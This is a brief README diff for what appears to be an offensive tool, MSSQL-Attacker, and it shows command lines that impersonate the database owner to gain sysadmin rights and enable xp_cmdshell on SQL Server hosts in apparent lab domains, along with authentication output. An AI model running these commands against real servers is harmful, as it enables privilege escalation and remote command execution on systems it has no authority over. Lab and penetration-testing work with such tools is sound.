RikunjSindhwad/MSSQL-Attacker/README.md

 #Used -impersonateDBO to togle impersonation to gain sysadmin priv.

-Z:\>MSSQLAttacker.exe cli -t dc01.corp1.com -d master -a enablecmdshell -impersonateDBO -dbo msdb [+] Auth success!
+Z:\>.\MSSQLAttackerV2-x64.exe cli -t dbsrv01.robensivelabs.local -a enablecmdshell -impersonateDBO -dbo sqladmindb [+] Auth success!
 [-] Value In Use: 0
 [-] xp_cmdshell is disabled